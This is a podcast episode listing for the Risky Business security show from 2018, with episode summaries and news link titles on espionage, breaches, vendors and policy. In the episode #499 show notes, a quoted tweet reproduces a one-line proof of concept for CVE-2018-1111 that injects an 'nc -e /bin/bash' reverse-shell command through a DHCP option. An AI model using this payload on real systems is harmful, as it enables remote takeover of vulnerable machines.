Risky Business

By Patrick Gray

Listen to a podcast, please open Podcast Republic app. Available on Google Play Store.


Risky Business is a weekly information security podcast featuring news and in-depth interviews with industry luminaries. Launched in February 2007, Risky Business is a must-listen digest for information security pros. With a running time of approximately 50-60 minutes, Risky Business is pacy; a security podcast without the waffle.

Episode Date
Snake Oilers 6 part 1: InsightIDR from Rapid7, whitelisting with Airlock Digital and testing your SOC personnel with AttackIQ

First up in this edition of Snake Oilers we speak with Rapid7. Listeners of the regular show would have heard me talk about their UserInsight software for years. That’s because I knew people who used it and they swore by it. UserInsight was user and entity behaviour analytics (UEBA) software that was massively ahead of its time. It was very good at spotting weird things happening on your network when it comes to dumped or compromised creds popping up in weird places.

Well, InsightIDR is basically where UserInsight wound up, and yeah, it’s morphed in to a product that’s half SIEM and half EDR.

Every Tom, Dick and Harriett seems to be offering EDR software these days, and every next-gen SIEM company is becoming more and more UEBA-centric, so what Rapid7 has created here is something in between. InsightIDR product manager Eric Sun will tell us all about it.

Next up we’ll hear the simplest pitch in this podcast, from Airlock Digital. They’re an Australian company that makes whitelisting software that’s actually useable. If your organisation has tried implementing whitelisting through Microsoft’s Applocker then you know how badly it sucks. These guys have created a simple but useable whitelisting solution.

I’ve been to the booth! I’ve seen the demo! Airlock Digital co-founder David Cottingham is our guest on their behalf. In addition to being a founder, David is also the author of the SANS course SEC480: which covers the ASD top 4 – number one on that list is whitelisting. He has experience in the federal government implementing whitelisting and after seeing just how badly other products suck, he and his mates founded Airlock Digital. So yeah, if you’re whitelist-curious or if you’re sick of dealing with Applocker, then you really, really should stick around for that one.

After that we’re checking in with Stephan Chenette of AttackIQ. They make attack simulation software, but in response to customer demand they’ve actually taken it to its logical extension - they’re now offering modules you can use to test your SOC staff, or, if you outsource, you can use these modules to test your MSSP. Throw some alerts at them and see what comes back – get scores for individual SOC operators. Hey, even if you ARE an MSSP you might want to use this software to see who to promote in your SOC. That’s interesting stuff.

Jun 21, 2018
Risky Business #504 -- Latest email frauds and changes to money muling

On this week’s show we’re chatting with Alex Tilley. He’s with Secureworks in Australia these days, but before that he spent a big chunk of his career with the Australian Federal Police.

He did a presentation a few weeks back at the AusCERT conference all about what fraud crews are up to these days. He’ll be joining us to walk through how much damage West African crime groups are doing with compromised office 365 accounts. We also talk a bit about trends in money muling, because that game has really changed.

This week’s show is brought to you by Cylance, and in this week’s sponsor interview we’ll be chatting with Cylance’s very own Jim Walter about how ransomware hasn’t really gone anywhere, despite most of the tech press getting sick of writing about it.

Adam Boileau, as usual, joins us to talk about the week’s news, including:

  • The Vault7 guy is totally screwed
  • US Senate scuttles Trump’s plan to save ZTE
  • Chinese pwning satellite comms, telcos
  • Olympic Destroyer crew is back

Links to everything are below and you can follow Patrick and Adam on Twitter if that’s your thing.

Show notes

Ex-CIA employee charged in major leak of agency hacking tools - The Washington Post
Ryan Duff on Twitter: "The CIA leaker conducted a privilege escalation on the computer he used to access the data he stole, erased all the logs of his activity, and then locked other users out. A lot more tradecraft here than your average leaker… https://t.co/vIy0JL2f63"
WikiLeaks Shares Alleged Diaries of Accused CIA Leaker Joshua Schulte - Motherboard
Senate rejects Trump’s plan to lift ZTE export ban | Ars Technica
China-based campaign breached satellite, defense companies: Symantec | Reuters
Senate bill hopes to sort out supply-chain cybersecurity risks, prevent next Kaspersky drama
Kaspersky Halts Europol and NoMoreRansom Project Coop After EU Parliament Vote
North Korea to blame for string of Latin America bank hacks, insiders say
After Trump courts Kim, U.S. issues warning on North Korean malware
The Olympic Destroyer Hackers May Have Returned For More | WIRED
Patrick Gray on Twitter: "And there it is. The circle is complete. The whole point of Olympic Destroyer was to cast doubt on attribution generally, even though nobody who matters ever made attribution claims based on a few “vectors”.… https://t.co/RFXQYGr7sl"
Yubico snatched my login token vulnerability to claim a $5k Google bug bounty, says bloke • The Register
Iran’s Telegram Ban Has Impacted All Corners of the Country | WIRED
FBI recovers WhatsApp, Signal data stored on Michael Cohen’s BlackBerry | Ars Technica
Reminder: macOS still leaks secrets stored on encrypted drives | Ars Technica
Verizon and AT&T will stop selling your phone’s location to data brokers | Ars Technica
Google to Fix Location Data Leak in Google Home, Chromecast — Krebs on Security
17 Backdoored Docker Images Removed From Docker Hub
Cortana Hack Lets You Change Passwords on Locked PCs
ZeroFont Technique Lets Phishing Emails Bypass Office 365 Security Filters
Hacker Breaches Syscoin GitHub Account and Poisons Official Client
Clipboard Hijacker Targeting Bitcoin & Ethereum Users Infects Over 300,0000 PCs
Chris Vickery on Twitter: "Holy shit. This guy, George Cottrell, was advertising money laundering services on the dark web. He was caught red-handed in a FBI sting. Guy is (was) top aide to the Brexit campaign leader, Nigel Farage. His super secret dark web username was "Banker". https://t.co/unEM4CnYVj"
InstaCyber on Twitter: "It begins. THANKS #GDPR https://t.co/JH9CyWGWcO"
Bitcoin’s Price Was Artificially Inflated, Fueling Skyrocketing Value, Researchers Say - The New York Times
Man Gets 20 Years In Jail For Trying To Steal A Domain Name At Gunpoint | Gizmodo Australia
Cops Are Confident iPhone Hackers Have Found a Workaround to Apple’s New Security Feature - Motherboard
cylance spear team - Google Search
Jun 20, 2018
Risky Business #503 -- North Korean tech in the global supply chain

You might have noticed North Korea’s been in the news over the last couple of days. Well, we’re sticking with the theme – we’ve got a great feature interview for you this week with Andrea Berger. She’s a senior research associate at the US-based James Martin Centre for Nonproliferation Studies and the co-host of the Arms Control Wonk podcast. This week she speaks with Risky Business contributor Hilary Louise about a report the centre did into North Korea’s IT industry.

Yep, they have one, and you’ll be surprised by its scope and reach. That’s this week’s feature interview.

This week’s sponsor interview is with Signal Sciences co-founder and CEO Andrew Peterson. Andrew was at a Gartner event in DC last week, and I grabbed some time with him to talk about what’s new in DevSecOps, how people are applying various DevSecOps tools, and what the general awareness of good DevSecOps practices is out there. Andrew’s prior career was in development, not security. He and Zane Lackey worked together at Etsy and Signal Sciences was very much inspired by the work they both did there. Andrew says analysts are starting to understand that web application security isn’t something you drop on to a network in an appliance and things are actually changing.

Mark “Pipes” Piper is this week’s news guest. All the show links are below and you can follow Patrick, Pipes or Hilary, if that floats your boat.

Show notes

Founder of Cybersecurity Company Says His Firm Was Sanctioned Because He was Born in Russia - Motherboard
Treasury Sanctions Russian Federal Security Service Enablers | U.S. Department of the Treasury
Republican senators move to block Trump’s deal to revive ZTE | Ars Technica
WannaCry Hero Marcus Hutchins' New Legal Woes Spell Trouble for White Hat Hackers | WIRED
Cisco's Talos Intelligence Group Blog: VPNFilter Update - VPNFilter exploits endpoints, targets new devices
Top U.S. counterintelligence official: Kaspersky's move to Switzerland doesn't matter
Chinese hackers stole sensitive U.S. Navy submarine plans from contractor
China ramps up hacking of U.S. high-tech companies | McClatchy Washington Bureau
Flash zero-day shows up in Qatar amid geopolitical struggles
NDAA pushes U.S. Cyber Command to be more aggressive
Senator hopes to draw red line discouraging election cyberattacks
Congress wants to prevent states from weakening encryption
FBI announces arrest of 74 email fraudsters on three continents
For almost 11 years, hackers could easily bypass 3rd-party macOS signature checks | Ars Technica
I can be Apple, and so can you | Okta
This app in Google Play wants to use phone mics to enforce copyrights | Ars Technica
In a blow to e-voting critics, Brazil suspends use of all paper ballots | Ars Technica
Some Signal Disappearing Messages Are Not Disappearing - Motherboard
US Government Probes Airplane Vulnerabilities, Says Airline Hack Is ‘Only a Matter of Time’ - Motherboard
Hackers Crashed a Bank’s Computers While Attempting a SWIFT Hack
Apple just banned cryptocurrency mining on iOS devices | Ars Technica
Ethereum "Giveaway" Scammers Have Tricked People Out of $4.3 Million
Around 5% of All Monero Currently in Circulation Has Been Mined Using Malware
Trik Spam Botnet Leaks 43 Million Email Addresses
DPRK's Shadow Sector report
Jun 13, 2018
Risky Business #502 -- Inside China's hacker scene

On this week’s show we chat with Peter Wesley. Peter’s well known around the Australian security scene, but a few years back he relocated to China, where security is booming. He did a presentation at the AusCERT conference on the Gold Coast last week all about the Chinese hacker scene and security industry. He joins us in this week’s feature interview to tell us about how the Chinese scene evolved and what its current relationship with the Chinese government looks like.

This week’s sponsor interview is a cracker. We’ll be joined by Ryan Kalember, Senior Vice President of Strategy with Proofpoint, the email filtering company. Ryan is along to talk about a phenomenon the Proofpointers are very interested in – we’ve all heard of VIPs, but he’s here to talk about VAPs – Very Attacked People.

So much attacker behaviour these days is driven by email-based attacks, and the people getting hit the most with this sort of stuff might not be the ones you expect. Ryan joins us later on for that conversation in this week’s sponsor interview, with thanks to Proofpoint.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

What Will Microsoft's GitHub Buy Mean For Controversial Code? | WIRED
A host of new security enhancements is coming to iOS and macOS | Ars Technica
Apple Is Testing a Feature That Could Kill Police iPhone Unlockers - Motherboard
Microsoft Adds Post-Quantum Cryptography to an OpenVPN Fork
Oracle WebLogic RCE Deserialization Vulnerability (CVE-2018-2628) - DZone Security
Data from 92 million accounts stolen from DNA testing site MyHeritage
Hacker Defaces Ticketfly’s Website, Steals Customer Database - Motherboard
SS7 routing-protocol breach of US cellular carrier exposed customer data | Ars Technica
Judge dismisses Kaspersky lawsuits, U.S. government ban will stand
Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'
Former DIA official allegedly sold secrets to China, including possible Cyber Command information
ICANN Launches GDPR Lawsuit to Clarify the Future of WHOIS | Threatpost | The first stop for security news
With possible summit approaching, North Korean espionage hacks continue | Ars Technica
Synack offers free penetration testing for election systems ahead of 2018 midterms
CrowdStrike announces $1 million warranty for breaches that happen under its watch
IE Zero-Day Adopted by RIG Exploit Kit After Publication of PoC Code
CVE-2018-8174 | Windows VBScript Engine Remote Code Execution Vulnerability
Chrome and Firefox leaks let sites steal visitors’ Facebook names, profile pics | Ars Technica
Zip Slip Vulnerability Affects Thousands of Projects Across Multiple Ecosystems
Malicious Git Repository Can Lead to Code Execution on Remote Systems
The NSA Just Released 136 Historical Propaganda Posters - Motherboard
NSA Security Posters 1950s-1970s - Album on Imgur
Jun 06, 2018
Risky Business #501 -- Trisis: signalling, deterrence or escalation?

On this week’s show we’ll be talking about a whole bunch of stuff – the FBI taking down a botnet in a very FBI way, we go deep on the Trisis malware popping up in the US following America’s withdrawal from the so-called Iran agreement. We look at the latest in the crypto debate, breaches, bugs and more!

We’ll hear from Tom Uren of Australia’s Strategic Policy Institute (ASPI) on the Trisis side of things. Tom worked in an interesting place in Australia’s defence department but these days spends his days think tanking for the Australian Strategic Policy Institute. He shares his thoughts on what it is Iran could be up to with Trisis.

This week’s show is brought to you by: Australia!

AustCYBER is a government-supported industry group here that is trying to get the Australian cybersecurity industry organised. There’s the VC-backed US model, the build a “cyber city” in the desert Israeli model, then there’s the Australia model, which is actually quite different. It’s much more about helping local startups win deals locally, then internationally, to get them on a path to profitability so they don’t have to sign the awful term sheets Australian VCs put in front of them.

Well, there’s more to it than that, but AustCYBER head honcho Michelle Price will be along in this week’s sponsor interview to walk us through what she’s trying to do for the Australian security industry and how foreign multinational companies can also benefit from that.

Show notes

Exclusive: FBI Seizes Control of Russian Botnet
Cisco's Talos Intelligence Group Blog: New VPNFilter malware targets at least 500K networking devices worldwide
Robᵉʳᵗ Graham 🤔 on Twitter: "This advice from the FBI is best described as "moronic". It advised 126 million households in the U.S. to reboot their routers in order to address a botnet of 500,000 devices located mostly outside the U.S. https://t.co/qhm96HmLVZ"
FBI: Kindly Reboot Your Router Now, Please — Krebs on Security
FBI shuts down domain behind Russian 'VPNFilter' botnet
Researchers uncover sophisticated botnet aimed at possible attack inside Ukraine
Trisis masterminds have expanded operations to target U.S. industrial firms
U.S. industry experts call for vigilance after Trisis group goes global
In the dark about 'going dark'
Encryption advocates rip FBI over inflated encrypted device statistics
Apple reports spike in national security requests amid promises of more transparency
Why Is Your Location Data No Longer Private? — Krebs on Security
The U.S. military combined cyber and kinetic operations to hunt down ISIS, general says
Hacker linked to Russian intelligence sentenced to five years in prison
Cyber crooks claim to hit two big Canadian banks | Reuters
Chinese researchers warn blockchain company EOS about 'epic' vulnerability in soon-to-launch platform
No one is updating their Android devices, new data shows
Oracle Plans to Drop Java Serialization Support, the Source of Most Security Bugs
3 Charged In Fatal Kansas ‘Swatting’ Attack — Krebs on Security
Russian unit, GRU officer linked to 2014 shoot-down of airliner over Ukraine | Ars Technica
Cyber Security Growth Network - Australian Cyber Security Growth Network
May 30, 2018
Risky Biz Soap Box: Kill your own meat with EclecticIQ

Soap Box is not our regular weekly show, it’s the monthly podcast here at Risky Biz HQ where vendors pay to come on to the show to talk about what it is they actually do.

Before EclecticIQ sponsored this edition, to be honest, I didn’t really know much about them. All I knew is that their positioning was very much around “threat intelligence,” which, as regular listeners would know, are two words that are usually followed by “derpa derpa” on the regular Risky Business podcast.

BUT! Here’s the thing. EclecticIQ don’t sell a “blinky light” box that receives a creaky feed of 12-month-old IOCs. They sell their solution to either massive organisations or very high risk organisations. They could be national cyber security centres, entire defence departments, very, very big enterprises; basically anyone that has an intelligence team and multiple constituent departments or agencies. They also play in ultra high risk sectors like defence contracting.

The EclecticIQ platform isn’t for small organisations. It really is for orgs that have dedicated, externally-focussed intelligence teams. Their play isn’t “we feed you threat intelligence,” it’s use our tooling to go get your own threat intelligence, develop a strategy for dealing with the resulting product then distributing the strategy that flows from that process out to the relevant people in your organisation. I like to think of this approach as “killing your own meat”. That’s what EclecticIQ is all about. They give you the shotgun and a map, the last known locations of the deer, a cool room and a bunch of cleavers. Delicious. Apologies to any vegetarians listening for that metaphor.

Joep Gommers is our guest. He is the founder and CEO of EclecticIQ. Prior to founding EclecticIQ, Joep served as Head of Global Collection and Global Intelligence Operations at iSIGHT Partners, which was, of course, acquired by FireEye. Joep joined me to talk about what it is that EclecticIQ actually does and the resulting conversation, I hope, will be interesting to anyone who wants to understand how Threat intelligence is developed and disseminated at scale.

There’s a link to EclecticIQ’s website below, and you can follow Joep Gommers on Twitter here.

May 28, 2018
Risky Business #500 -- Web asset discovery is getting useful

In this week’s feature interview we’ll be chatting with Shubham Shah and his friend Lord Tuskington about continuous asset discovery’s impact on testing methodologies. Shubs has worked as both a pentester and as a very successful bug bounty hunter. In fact he’s built an entire asset discovery platform that he and his buddies have been using to rip crazy amounts of cash out of bounty programs over the last few years and he’s turning that platform into a product. So I wanted to talk to him about that, but I also wanted to get a pentester’s perspective on how this type of continuous asset discovery tech could change the testing industry.

This week’s show is brought to you by Exabeam, a next generation SIEM company! And it’s amazing how nicely this week’s feature and sponsor interviews dovetail actually, because Exabeam’s Steve Gailey will be along in this week’s sponsor interview to have a chat about how SIEM technology has changed much faster than SOC operations methodologies. Because basically everyone has structured their operations around three levels of response and the workflows are so ingrained, nobody seems to know know what to do with a next generation SIEM.

Adam Boileau is also along, like always, to talk about the week’s security news.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

Alleged CIA Leaker Joshua Schulte Has Some of the Worst Opsec I’ve Ever Seen - Motherboard
Accused CIA leaker Joshua Schulte accused of more leaks
Alleged CIA Leaker Tweeted That Chelsea Manning ‘Should Be Executed’ - Motherboard
Trump feels presidential smartphone security is “too inconvenient” | Ars Technica
Trump, Chinese leaders moving forward on deal to save ZTE - The Washington Post
House measure asks DHS to share info on potential ZTE cyberthreat
Potential Trump deal to ease sanctions on China's ZTE riles Congress
Revealed: Pentagon Push to Hack Nuke Missiles Before They Launch
Banks Adopt Military-Style Tactics to Fight Cybercrime - The New York Times
Inside 'Project Indigo,' the quiet info-sharing program between banks and U.S. Cyber Command
Hacker Breaches Securus, the Company That Helps Cops Track Phones Across the US - Motherboard
LocationSmart bug allowed for leak of location data for nearly any U.S. phone - CyberScoop
Who's Afraid of Kaspersky? - Motherboard
New speculative-execution vulnerability strikes AMD, ARM, and Intel | Ars Technica
After Arrest in Serbia, Netflix Hackers ‘The Dark Overlord’ Say They’re Still Going - Motherboard
Cisco's Talos Intelligence Group Blog: TeleGrab - Grizzly Attacks on Secure Messaging
North Korea-tied hackers used Google Play and Facebook to infect defectors | Ars Technica
The Wayback Machine is Deleting Evidence of Malware Sold to Stalkers - Motherboard
Latvian national convicted of running 'VirusTotal-for-criminals' malware scanner
Alphabet's Jigsaw offers political campaigns free DDoS protection
T-Mobile Employee Made Unauthorized ‘SIM Swap’ to Steal Instagram Account — Krebs on Security
Karin Kosina on Twitter: "So the guy behind the Carbanak malware that stole hundreds of millions of dollars? He was caught because he bought a car for 70k and didn't pay the bill. Can't make this sh** up :) #opsec #fail https://t.co/rRmFzywmVI"
GPON Routers Attacked With New Zero-Day
Cisco fixes critical ‘DNA’ software flaws
Pakistan: Campaign of hacking, spyware and surveillance targets human rights defenders | Amnesty International
May 23, 2018
Risky Business feature interview: Hacking PUBG

Here it is – this week’s feature interview with Marisa Emerson! Marisa is a security researcher who did a great talk at BSides Canberra in March all about game cheating.

She was specifically talking about the cheating techniques PUBG gamers are using and just how advanced they are. The crazy thing is the cheaters here are rolling some pretty decent techniques. It’s reminiscent of the iPhone jailbreaking scene – a lot of good hackers who don’t know they’re good hackers.

Marisa is running a binary exploitation bootcamp in Brisbane that will have another session next semester. Details are here.

May 18, 2018
Risky Business #499 -- Is PGP actually busted and Signal pwnt? Noooope

In this week’s weekly show we’re just going to drill in to the week’s extra long security news section with Adam Boileau then go straight to the sponsor interview. I’ve got a fantastic feature interview for you this week, but I’m going to publish it outside of the news show. It was either that or run stupidly long or cut too much from everything to make it all fit.

This week’s sponsor interview is a good one though. We’re chatting with the team behind DarkTrace. They make a machine learning-backed network monitor. A key different with this kit is it actually gets involved on the network. If it sees something it’s confident is attacker behaviour it will start spraying TCP resets to boot them off the network.

This is something the IPS systems of old used to do but it’s an approach that fell out of favour. We’ll find out why that approach was discarded and why it’s coming back, as well as generally discuss the role of machine learning in security with a company that has invested in it heavily. This isn’t a “for or against” interview segment. This is a discussion with one company that is getting value out of the approach, so stick around for that.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

Without Nuclear Deal, U.S. Expects Resurgence in Iranian Cyberattacks - The New York Times
How Two Persian Gulf Nations Turned The US Media Into Their Battleground
National Security Council delays publication of cyber strategy over inclusion of 'offensive' measures
Bolton eliminates White House Cybersecurity Coordinator position
Lawmakers introduce bill to save top White House cyber job after Bolton eliminated it
Ex-CIA employee identified as suspect in 'Vault 7' leaks
Sebastian Schinzel on Twitter: "We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4"
'Efail' exploit can decrypt old emails that were previously encrypted - CyberScoop
Critical PGP and S/MIME bugs can reveal encrypted emails—uninstall now [Updated] | Ars Technica
CVE-2018-1000136 - Electron nodeIntegration Bypass
Security flaw in Electron impacts hundreds of desktop apps
Michael Gianarakis on Twitter: "I don’t know man - as I said I wasn’t involved so I don’t know what was tested and when, what was covered during disclosure etc. All I was saying in my original tweet was that I didn’t read the post to say any specific app was vulnerable or not.… https://t.co/wVmG4FE0yI"
Alfredo Ortega on Twitter: "Remote zero-click JavaScript code execution on signal desktop message app. Thanks @HacKanCuBa and @julianor https://t.co/YgT8akGfBI"
Alfredo Ortega on Twitter: "And we'll release the Signal-Desktop Remote code exec advisory (CVE-2018-10994) in some hours. Not a good week for privacy software. https://t.co/ElysIPAlvo"
It only took five hours to close a critical vulnerability in Signal's desktop client
'Disappearing' Signal Messages Are Stored Indefinitely on Mac Hard Drives - Motherboard
China's ZTE says main operations have ceased after US ban
Lucas Tomlinson on Twitter: "JUST IN: Pentagon orders all stores on U.S. military bases worldwide to ban phones and telecom equipment from Chinese companies Huawei and ZTE, following warnings from top U.S. intelligence officials the Chinese companies could be spying on Americans"
Donald J. Trump on Twitter: "President Xi of China, and I, are working together to give massive Chinese phone company, ZTE, a way to get back into business, fast. Too many jobs in China lost. Commerce Department has been instructed to get it done!"
Microsoft Enabling Javascript in Excel Has Security Pros Anxious | WIRED
Researcher Runs Coinhive Cryptominer in Excel Just Days After Microsoft Announces JavaScript Custom Functions
Researchers Come Up With a Way to Launch Rowhammer Attacks via Network Packets
Georgia governor vetoes cyber bill that would criminalize “unauthorized access” | Ars Technica
Russian Troll Farm Hijacked American Teen Girls’ Computers for Likes
Dutch ditch Kaspersky on fears of Russian government influence
Possible Kaspersky sanctions meet resistance inside U.S. government
Wyden calls for FCC investigation into cell-phone tracking used by law enforcement
Kia‏☆ on Twitter: "this isnt a joke, try out https://t.co/QKa5nNOKjN, you can find the current location of a phone (not just with cell tower info, it can force AGPS) with just *its phone number*; the demo site requires you reply to an SMS but there's no technical requirement against that! https://t.co/kfMDU2qxjZ"
Government would be barred from mandating crypto backdoors under House bill
Symantec's stock plummets after announcement of internal audit
Lawmakers call for action following revelations that APT28 posed as ISIS online
Counterrorism Officials Concerned About Technological Advances of Jihadists in the US
Vigilante Hacks Government-Linked Cyberespionage Group - Motherboard
Pakistani military leverages Facebook Messenger for wide-ranging spyware campaign
DDoS Attacks Leverage UPnP Protocol to Avoid Mitigation
Shadowy Hackers Accidentally Reveal Two Zero-Days to Security Researchers
Windows 10 OpenSSH Client Installed by Default in April 2018 Update
Malicious Apps Get Back on the Play Store Just by Changing Their Name
Multiple OS Vendors Release Security Patches After Misinterpreting Intel Docs
Barkın Kılıç on Twitter: "#CVE-2018-1111 tweetable PoC :) dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=,,1h --conf-file=/dev/null --dhcp-option=6, --dhcp-option=3, --dhcp-option="252,x'&nc -e /bin/bash 1337 #" cc: @cnbrkbolat… https://t.co/NMthW41Xql"
Morning mail: Ecuador's costly Assange spy operation | Australia news | The Guardian
Evil Mainframe Penetration Testing Classes
Evil Mainframe: Mainframe Penetration Testing Registration, Tue, Jun 12, 2018 at 9:00 AM | Eventbrite
May 16, 2018
Risky Business #498 -- There sure is a lot of Microsoft Defender out there these days

On this week’s show we’re taking a look at some recent data out of Microsoft trumpeting its Defender antivirus install figures on Windows. They’ve got 18% market share on windows 7/9 and 50% on Win10.

For the AV and endpoint security industry Microsoft has always been the existential threat, but has the plane flown into the mountain already? We’ll speak with Securosis analyst and DisruptOps founder Rich Mogull about that in this week’s feature interview.

In this week’s sponsor interview we’re joined by the always entertaining Haroon Meer of Thinkst Canary. When we spoke Haroon had just wrapped up his first ever booth at the RSA conference. He’ll join us this week to tell us, surprisingly, that it was a really worthwhile exercise for Thinkst, but as you’ll hear he also thinks the broader industry can be a pack of dumbasses when it comes to actually marketing tech at events like RSA. If he becomes global ruler RSA booths will be gimmick-free and just show people product demos.

The show notes/news items are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

BREAKING: Documents show how provincial employees misled Halifax police in the FOIPOP security failure
FTC urges Twitter users to change passwords | TheHill
Iran nuclear deal: Trump pulls US out in break with Europe allies - BBC News
Patrick Gray on Twitter: "There are teams workshopping ideas like this in Tehran right now, guaranteed. Personally I'm more worried about Iranian ICS hax. They've gotten good at that stuff.… https://t.co/XQBvRcUKw9"
Caroline O. on Twitter: "NEW: The Senate Intelligence Committee released its prelim findings into Russian targeting of election infrastructure during the 2016 election. "In a small # of states, Russian-affiliated cyber actors were in a position to, at a minimum, alter or delete voter registration data."… https://t.co/Y0GMwUZEFU"
Facebook security analyst is fired for using private data to stalk women | Ars Technica
Sources: Facebook Has Fired Multiple Employees for Snooping on Users - Motherboard
Drive-by Rowhammer attack uses GPU to compromise an Android phone | Ars Technica
Android App With 10 Million Downloads Left Users’ Photos and Audio Messages Exposed to Public - Motherboard
Hundreds of big-name sites hacked, converted into drive-by currency miners | Ars Technica
Report: Chinese government is behind a decade of hacks on software companies | Ars Technica
Over 10,000 companies downloading software vulnerable to Equifax hack
European Central Bank proposes framework to strengthen financial system’s defenses
Hysteria over Jade Helm exercise in Texas was fueled by Russians, former CIA director says | The Texas Tribune
Defector: WikiLeaks ‘Will Lie to Your Face’
SiliVaccine: Inside North Korea’s Anti-Virus - Check Point Research
You Can Finally Encrypt Slack Messages So Your Boss Can't Read Them - Motherboard
Microsoft May 2018 Patch Tuesday Fixes 67 Security Issues, Including IE Zero-Day
Vulnerabilities Affecting Over One Million Dasan GPON Routers Are Now Under Attack
He Fled a Prison in Iceland. Now It’s Good to Be Back. - The New York Times
Report: Software bug led to death in Uber’s self-driving crash | Ars Technica
Carbon Black stocks close 26 percent up on first day of public trading
Why Windows Defender Antivirus is the most deployed in the enterprise – Microsoft Secure
thinkst Thoughts...: Considering an RSAC Expo booth? Our Experience, in 5,000 words or less
May 09, 2018
Risky Biz Soap Box: Root9b on agentless threat hunting

In this edition of Soap Box we’re chatting with Root9b. They’ve just launched an updated version of their ORION platform. And I guess the way you’d describe Root9b is as a threat hunt product maker and managed threat hunt provider. And their approach is a bit different – their software is agentless. They basically authenticate to a machine, inject various payloads into memory, and use that to pull back all sorts of telemetry from machines.

They say this means it’s much less likely that attackers will see them and they offer this as a product, ORION, or they offer it as a service. They say their managed services customers come to them because pretty unhappy with their MDR and MSSP providers and want better signalling.

So I was joined by John Harbaugh, COO of Root9b, and Mike Morris, CTO. Both of these guys were US Air Force cyberdudes before jumping out to the private sector. The company actually started off doing training before developing their platform ORION.

John and Mike joined me by Skype for this podcast. Enjoy!

May 04, 2018
Risky Business #497 -- Silvio's greatest hits

This week’s Risky Business is kind of going back to its roots a bit. As much as we love talking about policy and the intersection of cyber security with global affairs, sometimes it pays to remember that computer security is actually about computers.

With that in mind this week we’ve got two fantastic interviews for you. We’ll be chatting with Dr. Silvio Cesare in this week’s feature interview. Silvio’s dusted off his bug hunting hat and he’s taken to Twitch-streaming his auditing sessions. Dave Aitel described watching Silvio’s Twitch stream as like seeing a Titan ransack a small Greek village. Five months, 100 bugs, 50 of them in kernel stuff.

He’s doing this for a couple of reasons – he wants to show people how it’s done, and he wants people to realise there are still lots of bugs out there to be found. We’ll chat to him about that in this week’s feature.

This week’s sponsor interview is with another old school hacker, Stephen Ridley. Stephen is the founder of Senrio, which is technically an IoT security play, but the thing is the tech he’s developed has turned out to be useful for all sorts of other stuff too.

Senrio is another one of those hacker-led startups in the spirit of Duo Security or Thinkst Canary. Stephen is a really well respected guy and this week he’s joining us to talk about a bunch of stuff. A lot of it is related to the unexpected uses for Senrio’s monitoring platform. He built a classifier for network-connected devices as a part of Senrio’s IoT security platform, and it turns out it’s actually running rings around a bunch of Enterprise Asset Management tools. People are actually using his IoT security monitoring solution to do asset management and figure out install gaps for their EDR solutions.

Totally not what he intended people to use it for, but hey, a win’s a win. So Stephen joins us this week to talk about that, also to talk about recent developments in the IoT space and really a bunch more stuff.

The show notes/links are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes

Amazon Web Services starts blocking domain-fronting, following Google’s lead - The Verge
Iran blocks Telegram, pushes replacement with “Death to America” emoji | Ars Technica
Chinese Authorities Accidentally Admit to Accessing Deleted WeChat Messages
As two Koreas shake hands, Hidden Cobra hackers wage espionage campaign | Ars Technica
North Korea's Elites Are Ditching Facebook for Chinese Social Networks
After data “clash” report, WhatsApp founder says he’s leaving Facebook | Ars Technica
Can This System of Unlocking Phones Crack the Crypto War?
Ray Ozzie’s plan for unlocking encrypted phones gets a chilly reception | Ars Technica
Matthew Green on Twitter: "This article on WhatsApp suggests that WhatsApp might be weakening its encryption, but doesn’t give any details. That’s pretty worrying. https://t.co/2LfWeqMMPt https://t.co/3n8GDxVLcT"
Tens of Thousands of Malicious Apps Using Facebook APIs | Threatpost | The first stop for security news
Intel Committee blasts FBI for not notifying Russian hacking victims - Cyberscoop
Startup Offers $3 Million to Anyone Who Can Hack the iPhone - Motherboard
This Russian Company Sells Zero-Day Exploits for Hospital Software - Motherboard
Google and Microsoft ask Georgia governor to veto 'hack back' bill
Joy Reid Blames Hackers, Just Like Everyone Else | WIRED
Security Trade-Offs in the New EU Privacy Law — Krebs on Security
A One-Minute Attack Let Hackers Spoof Hotel Master Keys | WIRED
Volkswagen and Audi Cars Vulnerable to Remote Hacking
Charlie Miller on Twitter: "Cool new research out on car hacking: https://t.co/sZ2v0GpwWy. Hang on or mute as I'll give my thoughts on it."
Lojack Becomes a Double-Agent
Europol shuts down one of the largest DDoS marketplaces in the world - CyberScoop
Police Have Seized Revenge Porn Site Anon-IB - Motherboard
Chinese Police Arrest 15 People Who Hid Malware Inside PUBG Cheat Apps
GitHub Accidentally Recorded Some Plaintext Passwords in Its Internal Logs
Starting Today, Google Chrome Will Show Warnings for Non-Logged SSL Certificates
Long Prison Sentence for Man Who Hacked Jail Computer System to Bust Out Friend
State threat-sharing center warns of multiple PHP vulnerabilities - CyberScoop
Escalating Privileges with CylancePROTECT — Atredis Partners
Hackers Scan the Web for Vulnerable WebLogic Servers After Oracle Botches Patch
silviocesare - Twitch
May 02, 2018
Risky Business #496 -- The China supply chain problem

On this week’s show we hear from Jennifer Bisceglie, the CEO of Interos Solutions, a company that recently prepared a report on supply chain security for the US government’s US-China Economic and Security Review Commission. Risky Business contributor Brian Donohue caught up with Jennifer to talk about the report and really get an idea of what supply chain risks look like from a macro level. The long and the short of it is the supply chain is already very, very opaque, so governments and the private sector will have to work pretty hard to mitigate the risks involved here.

This week’s show is brought to you by Netsparker, the web application security scanning toolmaker. Netsparker was founded nine years ago by this week’s sponsor guest, Ferruh Mavituna. He was a pentester who created Netsparker to help him with his own work. But just recently they raised a bundle of cash: US$40m. We’ll catch up with him and find out if a webapp scanning company with $40m is like the mule with the spinning wheel. It certainly seems like Ferruh has some ambitious plans. We haven’t seen this sort of money being raised by comparable companies so it’s definitely interesting stuff.

In this week’s news we cover off:

  • Mysterious BGP route hijacking for lame Ether theft (??)
  • Google disabling domain fronting
  • Canadian teen charged with downloading documents from a website
  • City of Atlanta spending $2.6m to recover from its ransomware event
  • RSA’s conference app fail
